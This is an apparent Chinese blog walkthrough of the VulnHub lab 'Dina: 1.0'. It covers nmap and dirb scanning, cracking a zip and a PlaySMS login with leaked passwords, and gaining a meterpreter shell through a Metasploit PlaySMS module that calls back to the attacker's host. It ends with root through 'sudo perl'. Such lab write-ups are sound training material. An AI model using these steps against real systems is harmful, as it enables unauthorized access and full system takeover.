vnlnhub系列:Dina: 1.0

vnlnhub系列:Dina: 1.0

靶机下载

一、信息收集

nmap扫描存活

nmap 192.168.23.0/24

image-20240801202435393

nmap扫描端口,开放端口80

nmap 192.168.23.172 -p- -sV -Pn -O

image-20240801202558024

dirb目录扫描,存在robots.txt文件、secure,tmp,uploads等目录

dirb http://192.168.23.172/

image-20240801202836600

访问80端口

image-20240801202738843

访问robots.txt

image-20240801202925185

逐个拼接访问,访问nothing时,页面显示not found,f12查看源码,发现5个密码,备份一下

#my secret pass
freedom
password
helloworld!
diana
iloveroot

image-20240801203432110

访问secure时,发现一个backup.zip压缩包

image-20240801203805853

下载下来,解压时需要密码,此前获得的密码可以用来爆破,得到密码 freedom

image-20240801204137835

解压后得到一个mp3文件,但是无法打开,显示损坏

image-20240801204224455

使用文本工具打开,给出了用户名和一个url地址

touhid

/SecreTSMSgatwayLogin

image-20240801204334148

访问得到的url地址,是一个playsms框架

image-20240801204653952

使用得到的用户名和密码本爆破登录,得到密码 diana

touhid:diana

image-20240801205029514

二、getshell

msfconsole,搜索playsms

msfconsole

search playsms

image-20240801205856517

尝试可利用漏洞,options查看配置

use 0

options

image-20240801210200726

配置信息

image-20240801210224300

将需要的配置信息补全

set password diana

set rhosts 192.168.23.172	(靶机IP)

set targeturi SecreTSMSgatwayLogin	(上传文件的路径)

set username touhid

set lhost 192.168.23.133	(攻击机kali的IP)

run

image-20240801210755759

成功得到meterpreter

image-20240801210845213

三、提权

输入shell,python提升交互性,并查看当前权限

shell

python -c "import pty;pty.spawn('/bin/bash')"

sudo -l

image-20240801211110472

可以看到所有用户都可以执行perl命令

执行命令进行提权,提权成功

sudo perl -e 'exec "/bin/sh";'

image-20240801211546328

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值